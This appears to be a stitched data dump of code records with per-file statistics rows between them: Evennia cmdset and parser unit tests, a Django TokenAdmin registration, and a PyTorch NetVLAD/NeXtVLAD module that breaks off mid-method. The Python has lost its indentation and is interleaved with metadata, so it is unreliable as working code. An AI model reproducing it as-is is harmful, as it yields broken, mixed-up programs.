A has all False options, merges first (forward merge) with lowest prio. This
is the normal behavior for a low-prio cmdset. Passthrough should happen.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
cmdset_f = a + b + c + d # forward, A low prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_highprio_block_passthrough(self):
"""
        A has all False options, the other cmdsets have True. A merges last with
        high prio. A should retain its option values and override the others.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
c.no_exits = True
b.no_objs = True
d.duplicates = True
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, high prio
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_highprio_block_passthrough(self):
"""
        A has all False options, the other cmdsets have True. A merges first
        (forward merge) with high prio. This situation should never happen, but
        the logic should hold: the highest prio's options should survive the merge.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 1
c.priority = 0
d.priority = -1
c.no_exits = True
b.no_channels = True
b.no_objs = True
d.duplicates = True
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, high prio, never happens
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_block(self):
"""
        A has all False options, the other cmdsets have True. A merges first
        (forward merge) with low prio. This should result in its values being
        blocked, coming out True.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = True
c.no_channels = True
b.no_objs = True
d.duplicates = True
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, A low prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__forward_lowprio_block_partial(self):
"""
        A has all False options, the other cmdsets have True except C, which has
        None for `no_channels`. A merges first (forward merge) with low prio.
        This should result in its values being blocked and coming out True,
        except for no_channels which passes through.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = True
c.no_channels = None # passthrough
b.no_objs = True
d.duplicates = True
# higher-prio sets will change the option up the chain
cmdset_f = a + b + c + d # forward, A low prio
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_sameprio_order_last(self):
"""
A has all False options and highest prio, D has True and lowest prio,
others are passthrough. B has the same prio as A, with passthrough.
Since A is merged last, this should give prio to A's False options
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 2
c.priority = 0
d.priority = -1
d.no_channels = True
d.no_exits = True
d.no_objs = True
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, A high prio, merged after b
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_sameprio_order_first(self):
"""
A has all False options and highest prio, D has True and lowest prio,
others are passthrough. B has the same prio as A, with passthrough.
While B, with None-values, is merged after A, A's options should have
replaced those of D at that point, and since B has passthrough the
final result should contain A's False options.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 2
c.priority = 0
d.priority = -1
d.no_channels = True
d.no_exits = True
d.no_objs = True
d.duplicates = False
# higher-prio sets will change the option up the chain
cmdset_f = d + c + a + b # reverse, A high prio, merged before b
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
def test_option_transfer__reverse_lowprio_block(self):
"""
        A has all False options, the other cmdsets have True. A merges last with
        low prio. This usually doesn't happen in practice (a low-prio cmdset
        would merge first), but the logic should hold and the low-prio cmdset's
        values should be blocked, coming out True.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = -1
b.priority = 0
c.priority = 1
d.priority = 2
c.no_exits = True
d.no_channels = True
b.no_objs = True
d.duplicates = True
# higher-prio sets will change the option up the chain
cmdset_f = d + c + b + a # reverse, A low prio, never happens
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
class TestDuplicateBehavior(TestCase):
"""
    Test behavior of the .duplicates option, which is a bit special in that it
doesn't propagate.
`A.duplicates=True` for all tests.
"""
def setUp(self):
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
self.cmdset_a.priority = 0
self.cmdset_b.priority = 0
self.cmdset_c.priority = 0
self.cmdset_d.priority = 0
self.cmdset_a.duplicates = True
def test_reverse_sameprio_duplicate(self):
"""
Test of `duplicates` transfer which does not propagate. Only
A has duplicates=True.
D + B = DB (no duplication, DB.duplication=None)
DB + C = DBC (no duplication, DBC.duplication=None)
DBC + A = final (duplication, final.duplication=None)
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
        cmdset_f = d + b + c + a  # a merges last with duplicates=True
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 8)
    def test_reverse_sameprio_duplicate_c(self):
"""
Test of `duplicates` transfer, which does not propagate.
C.duplication=True
D + B = DB (no duplication, DB.duplication=None)
DB + C = DBC (duplication, DBC.duplication=None)
DBC + A = final (duplication, final.duplication=None)
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
c.duplicates = True
cmdset_f = d + b + c + a # two last mergers duplicates=True
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 10)
def test_forward_sameprio_duplicate(self):
"""
Test of `duplicates` transfer which does not propagate.
C.duplication=True, merges later than A
D + B = DB (no duplication, DB.duplication=None)
DB + A = DBA (duplication, DBA.duplication=None)
DBA + C = final (duplication, final.duplication=None)
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
c.duplicates = True
cmdset_f = d + b + a + c # two last mergers duplicates=True
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 10)
def test_reverse_sameprio_duplicate_reverse(self):
"""
Test of `duplicates` transfer which does not propagate.
C.duplication=False (explicit), merges before A. This behavior is the
same as if C.duplication=None, since A merges later and takes
precedence.
D + B = DB (no duplication, DB.duplication=None)
DB + C = DBC (no duplication, DBC.duplication=None)
DBC + A = final (duplication, final.duplication=None)
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
c.duplicates = False
cmdset_f = d + b + c + a # a merges last, takes precedence
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 8)
def test_reverse_sameprio_duplicate_forward(self):
"""
Test of `duplicates` transfer which does not propagate.
C.duplication=False (explicit), merges after A. This just means
only A causes duplicates, earlier in the chain.
D + B = DB (no duplication, DB.duplication=None)
DB + A = DBA (duplication, DBA.duplication=None)
DBA + C = final (no duplication, final.duplication=None)
Note that DBA has 8 cmds due to A merging onto DB with duplication,
but since C merges onto this with no duplication, the union will hold
        6 commands: C's two commands replace the four duplicated A/B entries
        with unique copies from C.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
c.duplicates = False
cmdset_f = d + b + a + c # a merges before c
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 6)
class TestOptionTransferReplace(TestCase):
"""
Test option transfer through more complex merge types.
"""
def setUp(self):
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
self.cmdset_a.priority = 0
self.cmdset_b.priority = 0
self.cmdset_c.priority = 0
self.cmdset_d.priority = 0
self.cmdset_a.no_exits = True
self.cmdset_a.no_objs = True
self.cmdset_a.no_channels = True
self.cmdset_a.duplicates = True
def test_option_transfer__replace_reverse_highprio(self):
"""
A has all options True and highest priority. C has them False and is
Replace-type.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.priority = 2
b.priority = 2
c.priority = 0
c.mergetype = "Replace"
c.no_channels = False
c.no_exits = False
c.no_objs = False
c.duplicates = False
d.priority = -1
cmdset_f = d + c + b + a # reverse, A high prio, C Replace
self.assertTrue(cmdset_f.no_exits)
self.assertTrue(cmdset_f.no_objs)
self.assertTrue(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 7)
def test_option_transfer__replace_reverse_highprio_from_false(self):
"""
Inverse of previous test: A has all options False and highest priority.
C has them True and is Replace-type.
"""
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.no_exits = False
a.no_objs = False
a.no_channels = False
a.duplicates = False
a.priority = 2
b.priority = 2
c.priority = 0
c.mergetype = "Replace"
c.no_channels = True
c.no_exits = True
c.no_objs = True
c.duplicates = True
d.priority = -1
cmdset_f = d + c + b + a # reverse, A high prio, C Replace
self.assertFalse(cmdset_f.no_exits)
self.assertFalse(cmdset_f.no_objs)
self.assertFalse(cmdset_f.no_channels)
self.assertIsNone(cmdset_f.duplicates)
self.assertEqual(len(cmdset_f.commands), 4)
# test cmdhandler functions
import sys
from evennia.commands import cmdhandler
from twisted.trial.unittest import TestCase as TwistedTestCase
def _mockdelay(time, func, *args, **kwargs):
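    # stand-in for the session handler's `delay`: run the callable immediately
    # instead of scheduling it, so the tests don't have to wait on a timer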
return func(*args, **kwargs)
class TestGetAndMergeCmdSets(TwistedTestCase, BaseEvenniaTest):
"Test the cmdhandler.get_and_merge_cmdsets function."
def setUp(self):
self.patch(sys.modules["evennia.server.sessionhandler"], "delay", _mockdelay)
super().setUp()
self.cmdset_a = _CmdSetA()
self.cmdset_b = _CmdSetB()
self.cmdset_c = _CmdSetC()
self.cmdset_d = _CmdSetD()
def set_cmdsets(self, obj, *args):
"Set cmdets on obj in the order given in *args"
for cmdset in args:
obj.cmdset.add(cmdset)
def test_from_session(self):
a = self.cmdset_a
a.no_channels = True
self.set_cmdsets(self.session, a)
deferred = cmdhandler.get_and_merge_cmdsets(
self.session, self.session, None, None, "session", ""
)
def _callback(cmdset):
self.assertEqual(cmdset.key, "A")
deferred.addCallback(_callback)
return deferred
def test_from_account(self):
from evennia.commands.default.cmdset_account import AccountCmdSet
a = self.cmdset_a
a.no_channels = True
self.set_cmdsets(self.account, a)
deferred = cmdhandler.get_and_merge_cmdsets(
self.account, None, self.account, None, "account", ""
)
# get_and_merge_cmdsets converts to lower-case internally.
def _callback(cmdset):
pcmdset = AccountCmdSet()
pcmdset.at_cmdset_creation()
pcmds = [cmd.key for cmd in pcmdset.commands] + ["a", "b", "c", "d"]
self.assertTrue(all(cmd.key in pcmds for cmd in cmdset.commands))
# _callback = lambda cmdset: self.assertEqual(sum(1 for cmd in cmdset.commands if cmd.key in ("a", "b", "c", "d")), 4)
deferred.addCallback(_callback)
return deferred
def test_from_object(self):
self.set_cmdsets(self.obj1, self.cmdset_a)
deferred = cmdhandler.get_and_merge_cmdsets(self.obj1, None, None, self.obj1, "object", "")
# get_and_merge_cmdsets converts to lower-case internally.
def _callback(cmdset):
return self.assertEqual(
sum(1 for cmd in cmdset.commands if cmd.key in ("a", "b", "c", "d")), 4
)
deferred.addCallback(_callback)
return deferred
def test_multimerge(self):
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.no_exits = True
a.no_channels = True
self.set_cmdsets(self.obj1, a, b, c, d)
deferred = cmdhandler.get_and_merge_cmdsets(self.obj1, None, None, self.obj1, "object", "")
def _callback(cmdset):
self.assertTrue(cmdset.no_exits)
self.assertTrue(cmdset.no_channels)
self.assertEqual(cmdset.key, "D")
deferred.addCallback(_callback)
return deferred
def test_duplicates(self):
a, b, c, d = self.cmdset_a, self.cmdset_b, self.cmdset_c, self.cmdset_d
a.no_exits = True
a.no_channels = True
b.duplicates = True
d.duplicates = True
self.set_cmdsets(self.obj1, a, b, c, d)
deferred = cmdhandler.get_and_merge_cmdsets(self.obj1, None, None, self.obj1, "object", "")
def _callback(cmdset):
self.assertEqual(len(cmdset.commands), 9)
deferred.addCallback(_callback)
return deferred
class AccessableCommand(Command):
    def access(self, *args, **kwargs):
return True
class _CmdTest1(AccessableCommand):
key = "test1"
arg_regex = None
class _CmdTest2(AccessableCommand):
key = "another command"
arg_regex = None
class _CmdTest3(AccessableCommand):
key = "&the third command"
arg_regex = None
class _CmdTest4(AccessableCommand):
key = "test2"
arg_regex = None
class _CmdSetTest(CmdSet):
key = "test_cmdset"
def at_cmdset_creation(self):
self.add(_CmdTest1)
self.add(_CmdTest2)
self.add(_CmdTest3)
class TestCmdParser(TestCase):
def test_create_match(self):
class DummyCmd:
pass
dummy = DummyCmd()
self.assertEqual(
cmdparser.create_match("look at", "look at target", dummy, "look"),
("look at", " target", dummy, 7, 0.5, "look"),
)
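        # Field-by-field reading of the match tuple above (inferred from the
        # asserted values): (matched cmdname, remaining args, cmd object,
        # length of the matched name, matched length / total input length,
        # raw cmdname as passed in). Here "look at" covers 7 of the 14 input
        # characters, hence the 0.5 ratio.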
@override_settings(CMD_IGNORE_PREFIXES="@&/+")
def test_build_matches(self):
a_cmdset = _CmdSetTest()
bcmd = [cmd for cmd in a_cmdset.commands if cmd.key == "test1"][0]
# normal parsing
self.assertEqual(
cmdparser.build_matches("test1 rock", a_cmdset, include_prefixes=False),
[("test1", " rock", bcmd, 5, 0.5, "test1")],
)
# test prefix exclusion
bcmd = [cmd for cmd in a_cmdset.commands if cmd.key == "another command"][0]
self.assertEqual(
cmdparser.build_matches(
"@another command smiles to me ", a_cmdset, include_prefixes=False
),
[("another command", " smiles to me ", bcmd, 15, 0.5, "another command")],
)
# test prefix exclusion on the cmd class
bcmd = [cmd for cmd in a_cmdset.commands if cmd.key == "&the third command"][0]
self.assertEqual(
cmdparser.build_matches("the third command", a_cmdset, include_prefixes=False),
[("the third command", "", bcmd, 17, 1.0, "&the third command")],
)
@override_settings(SEARCH_MULTIMATCH_REGEX=r"(?P<number>[0-9]+)-(?P<name>.*)")
def test_num_differentiators(self):
self.assertEqual(cmdparser.try_num_differentiators("look me"), (None, None))
self.assertEqual(cmdparser.try_num_differentiators("look me-3"), (3, "look me"))
self.assertEqual(cmdparser.try_num_differentiators("look me-567"), (567, "look me"))
@override_settings(
SEARCH_MULTIMATCH_REGEX=r"(?P<number>[0-9]+)-(?P<name>.*)", CMD_IGNORE_PREFIXES="@&/+"
)
def test_cmdparser(self):
a_cmdset = _CmdSetTest()
bcmd = [cmd for cmd in a_cmdset.commands if cmd.key == "test1"][0]
self.assertEqual(
cmdparser.cmdparser("test1hello", a_cmdset, None),
[("test1", "hello", bcmd, 5, 0.5, "test1")],
)
class TestCmdSetNesting(BaseEvenniaTest):
"""
    Test 'nesting' of cmdsets by adding one cmdset inside another.
"""
def test_nest(self):
class CmdA(Command):
key = "a"
def func(self):
self.msg(str(self.obj))
class CmdSetA(CmdSet):
def at_cmdset_creation(self):
self.add(CmdA)
class CmdSetB(CmdSet):
def at_cmdset_creation(self):
self.add(CmdSetA)
        self.char1.cmdset.add(CmdSetB)
        cmd = self.char1.cmdset.cmdset_stack[-1].commands[0]
self.assertEqual(cmd.obj, self.char1)
| 37.634775
| 126
| 0.631563
| 6,346
| 45,237
| 4.334699
| 0.053104
| 0.063872
| 0.027483
| 0.008143
| 0.864076
| 0.841064
| 0.835648
| 0.824778
| 0.800967
| 0.798931
| 0
| 0.008992
| 0.272299
| 45,237
| 1,201
| 127
| 37.666112
| 0.826635
| 0.234609
| 0
| 0.783611
| 0
| 0
| 0.025564
| 0.003704
| 0
| 0
| 0
| 0
| 0.279129
| 1
| 0.096031
| false
| 0.021767
| 0.011524
| 0.003841
| 0.172855
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f3cb30d86c5c85adcae719bbbd7b32d3898f2dc
| 204
|
py
|
Python
|
client/admin.py
|
goldentoaste/authentication-lab
|
6b139d79e40ccf5ac053019c09f11e1c6ac8d4a5
|
[
"MIT"
] | null | null | null |
client/admin.py
|
goldentoaste/authentication-lab
|
6b139d79e40ccf5ac053019c09f11e1c6ac8d4a5
|
[
"MIT"
] | null | null | null |
client/admin.py
|
goldentoaste/authentication-lab
|
6b139d79e40ccf5ac053019c09f11e1c6ac8d4a5
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
# Register your models here.
from rest_framework.authtoken.admin import TokenAdmin
from rest_framework.authtoken.models import Token
TokenAdmin.raw_id_fields = ('user',)
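# Note (hedged): `rest_framework.authtoken` registers its own admin for the
# Token model when the app is installed; the line above only swaps the user
# <select> widget for a raw-ID lookup so the admin form stays usable with
# large user tables. If manual registration were ever needed, a sketch:
#
#   admin.site.register(Token, TokenAdmin)  # normally unnecessary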
| 29.142857
| 53
| 0.828431
| 28
| 204
| 5.892857
| 0.642857
| 0.09697
| 0.206061
| 0.315152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102941
| 204
| 7
| 54
| 29.142857
| 0.901639
| 0.127451
| 0
| 0
| 0
| 0
| 0.022599
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4f3ea3918aa344407e64c97592c457f06b5e559e
| 79,457
|
py
|
Python
|
model.py
|
glee1228/segment_temporal_context_aggregation
|
e5778f848f1cfd89bd1f77beb5e1b38a66a2f13d
|
[
"Apache-2.0"
] | 1
|
2022-03-15T18:17:45.000Z
|
2022-03-15T18:17:45.000Z
|
model.py
|
glee1228/segment_temporal_context_aggregation
|
e5778f848f1cfd89bd1f77beb5e1b38a66a2f13d
|
[
"Apache-2.0"
] | null | null | null |
model.py
|
glee1228/segment_temporal_context_aggregation
|
e5778f848f1cfd89bd1f77beb5e1b38a66a2f13d
|
[
"Apache-2.0"
] | null | null | null |
import copy
import math
import numpy as np
import horovod.torch as hvd
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset
from torchvision import models
#
# class NetVLAD(nn.Module):
# """NetVLAD layer implementation"""
#
# def __init__(self, feature_size, num_clusters=256, output_dim=1024, normalize_input=True, alpha=1.0, drop_rate=0.5, gating_reduction=8):
# super(NetVLAD, self).__init__()
# self.feature_size = feature_size
# self.num_clusters = num_clusters
# self.normalize_input = normalize_input
# self.alpha = alpha
#
# self.bn1 = nn.BatchNorm1d(feature_size)
# self.conv = nn.Conv1d(feature_size, num_clusters,
# kernel_size=1, bias=True)
# self.centroids = nn.Parameter(torch.rand(num_clusters, feature_size))
#
# self.bn2 = nn.BatchNorm1d(feature_size * num_clusters)
# self.drop = nn.Dropout(drop_rate)
#
# self.fc1 = nn.Linear(feature_size * num_clusters, output_dim)
# self.bn3 = nn.BatchNorm1d(output_dim)
# self.fc2 = nn.Linear(output_dim, output_dim // gating_reduction)
# self.bn4 = nn.BatchNorm1d(output_dim // gating_reduction)
# self.fc3 = nn.Linear(output_dim // gating_reduction, output_dim)
# self._init_params()
#
# def _init_params(self):
# self.conv.weight = nn.Parameter(
# (2.0 * self.alpha * self.centroids).unsqueeze(-1)
# )
# self.conv.bias = nn.Parameter(
# - self.alpha * self.centroids.norm(dim=1)
# )
#
# def forward(self, x, num_frames):
# N, C, T = x.shape[:3] # (N, C, T)
# # mask padded frame feature
# if len(num_frames.shape) == 1:
# num_frames = num_frames.unsqueeze(1)
# frame_mask = (
# 0 < num_frames - torch.arange(0, T).cuda()
# ).float() # (N, T)
#
# assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
#
# x = self.bn1(x)
# if self.normalize_input:
# x = F.normalize(x, p=2, dim=1) # across descriptor dim
#
# # soft-assignment
# soft_assign = self.conv(x) # (N, num_clusters, T)
# soft_assign = F.softmax(soft_assign, dim=1) # (N, num_clusters, T)
# soft_assign = soft_assign * frame_mask.unsqueeze(1)
#
# soft_assign_sum = torch.sum(
# soft_assign, dim=-1, keepdim=True) # (N, num_clusters, 1)
# # (N, num_clusters, feature_size)
# centervlad = self.centroids * soft_assign_sum
#
# x_flatten = x.view(N, C, -1) # (N, feature_size, T)
# # (N, num_clusters, feature_size)
# vlad = torch.bmm(soft_assign, x_flatten.transpose(1, 2))
# vlad -= centervlad # (N, num_clusters, feature_size)
#
# # intra-normalization (N, num_clusters, feature_size)
# vlad = F.normalize(vlad, p=2, dim=2)
# # flatten (N, num_clusters * feature_size)
# vlad = vlad.view(x.size(0), -1)
# vlad = self.bn2(vlad)
#
# vlad = self.drop(vlad)
#
# activation = self.bn3(self.fc1(vlad)) # (N, output_dim)
#
# # (N, output_dim // gating_reduction)
# gates = F.relu(self.bn4(self.fc2(activation)))
# gates = torch.sigmoid(self.fc3(gates)) # (N, output_dim)
#
# activation = activation * gates # (N, output_dim)
# # L2 normalize (N, num_clusters * feature_size)
# vlad = F.normalize(activation, p=2, dim=1)
#
# # L2 normalize (N, output_dim) IMPORTANT!!!
# embedding = F.normalize(vlad, p=2, dim=1)
#
# return embedding # (N, output_dim)
#
# def encode(self, x, num_frames):
# N, C, T = x.shape[:3] # (N, C, T)
# # mask padded frame feature
# if len(num_frames.shape) == 1:
# num_frames = num_frames.unsqueeze(1)
# frame_mask = (
# 0 < num_frames - torch.arange(0, T).cuda()
# ).float() # (N, T)
#
# assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# x = self.bn1(x)
# if self.normalize_input:
# x = F.normalize(x, p=2, dim=1) # across descriptor dim
#
# # soft-assignment
# soft_assign = self.conv(x) # (N, num_clusters, T)
# soft_assign = F.softmax(soft_assign, dim=1) # (N, num_clusters, T)
# soft_assign = soft_assign * frame_mask.unsqueeze(1)
#
# soft_assign_sum = torch.sum(
# soft_assign, dim=-1, keepdim=True) # (N, num_clusters, 1)
# # (N, num_clusters, feature_size)
# centervlad = self.centroids * soft_assign_sum
#
# x_flatten = x.view(N, C, -1) # (N, feature_size, T)
# # (N, num_clusters, feature_size)
# vlad = torch.bmm(soft_assign, x_flatten.transpose(1, 2))
# vlad -= centervlad # (N, num_clusters, feature_size)
#
# # intra-normalization (N, num_clusters, feature_size)
# vlad = F.normalize(vlad, p=2, dim=2)
# return vlad
class NetVLAD(nn.Module):
def __init__(self, dims, num_clusters, outdims=None):
super(NetVLAD, self).__init__()
self.num_clusters = num_clusters
self.dims = dims
self.centroids = nn.Parameter(torch.randn(num_clusters, dims) / math.sqrt(self.dims))
self.conv = nn.Conv2d(dims, num_clusters, kernel_size=1, bias=False)
if outdims is not None:
self.outdims = outdims
self.reduction_layer = nn.Linear(self.num_clusters * self.dims, self.outdims, bias=False)
else:
self.outdims = self.num_clusters * self.dims
self.norm = nn.LayerNorm(self.outdims)
self.reset_parameters()
def reset_parameters(self):
self.conv.weight = nn.Parameter(self.centroids.detach().clone().unsqueeze(-1).unsqueeze(-1))
if hasattr(self, 'reduction_layer'):
nn.init.normal_(self.reduction_layer.weight, std=1 / math.sqrt(self.num_clusters * self.dims))
def forward(self, x, mask=None, sample=False):
N, C, T, R = x.shape
# soft-assignment
soft_assign = self.conv(x).view(N, self.num_clusters, -1)
soft_assign = F.softmax(soft_assign, dim=1).view(N, self.num_clusters, T, R)
x_flatten = x.view(N, C, -1)
vlad = torch.zeros([N, self.num_clusters, C], dtype=x.dtype, layout=x.layout, device=x.device)
for cluster in range(self.num_clusters): # slower than non-looped, but lower memory usage
residual = x_flatten.unsqueeze(0).permute(1, 0, 2, 3) - self.centroids[cluster:cluster + 1, :]. \
expand(x_flatten.size(-1), -1, -1).permute(1, 2, 0).unsqueeze(0)
residual = residual.view(N, C, T, R)
residual *= soft_assign[:, cluster:cluster + 1, :]
if mask is not None:
residual = residual.masked_fill((1 - mask.unsqueeze(1).unsqueeze(-1)).bool(), 0.0)
vlad[:, cluster:cluster + 1, :] = residual.sum([-2, -1]).unsqueeze(1)
vlad = F.normalize(vlad, p=2, dim=2) # intra-normalization
vlad = vlad.view(x.size(0), -1) # flatten
vlad = F.normalize(vlad, p=2, dim=1) # L2 normalize
if hasattr(self, 'reduction_layer'):
vlad = self.reduction_layer(vlad)
return self.norm(vlad)
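# Hedged usage sketch for the NetVLAD module above (shapes read off the
# forward() signature: x is (N, C, T, R) with C == dims):
#
#   vlad = NetVLAD(dims=512, num_clusters=64, outdims=1024)
#   x = torch.randn(2, 512, 30, 9)   # 2 clips, 30 frames, 9 regions per frame
#   mask = torch.ones(2, 30)         # (N, T); 1 marks a valid frame
#   out = vlad(x, mask=mask)         # -> (2, 1024) LayerNorm'd descriptor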
class NeXtVLAD(nn.Module):
"""NeXtVLAD layer implementation"""
def __init__(self, feature_size, num_clusters=64, output_dim=1024, normalize_input=True, expansion=2, groups=8, drop_rate=0.5, gating_reduction=8):
super(NeXtVLAD, self).__init__()
self.feature_size = feature_size
self.num_clusters = num_clusters
self.normalize_input = normalize_input
self.expansion = expansion
self.groups = groups
self.conv1 = nn.Conv1d(
feature_size, feature_size * expansion, kernel_size=1, bias=True)
self.conv2 = nn.Conv1d(feature_size * expansion,
groups, kernel_size=1, bias=True)
self.conv3 = nn.Conv1d(feature_size * expansion,
num_clusters * groups, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm1d(num_clusters * groups)
self.centroids = nn.Parameter(torch.rand(
num_clusters, feature_size * expansion // groups))
self.bn2 = nn.BatchNorm1d(
feature_size * expansion // groups * num_clusters)
self.drop = nn.Dropout(drop_rate)
self.fc1 = nn.Linear(feature_size * expansion //
groups * num_clusters, output_dim)
self.bn3 = nn.BatchNorm1d(output_dim)
self.fc2 = nn.Linear(output_dim, output_dim // gating_reduction)
self.bn4 = nn.BatchNorm1d(output_dim // gating_reduction)
self.fc3 = nn.Linear(output_dim // gating_reduction, output_dim)
def forward(self, x, num_frames):
N, C, T = x.shape[:3] # (N, C, T)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
if self.normalize_input:
x = F.normalize(x, p=2, dim=1) # across descriptor dim
x = self.conv1(x) # (N, feature_size * expansion, T)
# attention factor of per group
attention = torch.sigmoid(self.conv2(x)) # (N, groups, T)
attention = attention * frame_mask.unsqueeze(1)
attention = attention.view(N, 1, -1) # (N, 1, groups * T)
# calculate activation factor of per group per cluster
feature_size = self.feature_size * self.expansion // self.groups
activation = self.conv3(x) # (N, num_clusters * groups, T)
activation = self.bn1(activation)
# reshape of activation
# (N, num_clusters, groups * T)
activation = activation.view(N, self.num_clusters, -1)
# softmax on per cluster
# (N, num_clusters, groups * T)
activation = F.softmax(activation, dim=1)
activation = activation * attention # (N, num_clusters, groups * T)
activation_sum = torch.sum(
activation, dim=-1, keepdim=True) # (N, num_clusters, 1)
# (N, num_clusters, feature_size)
centervlad = self.centroids * activation_sum
# (N, feature_size, groups * T)
        x_reshaped = x.view(N, feature_size, -1)
        vlad = torch.bmm(activation, x_reshaped.transpose(1, 2)
) # (N, num_clusters, feature_size)
vlad -= centervlad # (N, num_clusters, feature_size)
# intra-normalization (N, num_clusters, feature_size)
vlad = F.normalize(vlad, p=2, dim=2)
# flatten (N, num_clusters * feature_size)
vlad = vlad.view(N, -1)
vlad = self.bn2(vlad)
vlad = self.drop(vlad)
activation = self.bn3(self.fc1(vlad)) # (N, output_dim)
# (N, output_dim // gating_reduction)
gates = F.relu(self.bn4(self.fc2(activation)))
gates = torch.sigmoid(self.fc3(gates)) # (N, output_dim)
activation = activation * gates # (N, output_dim)
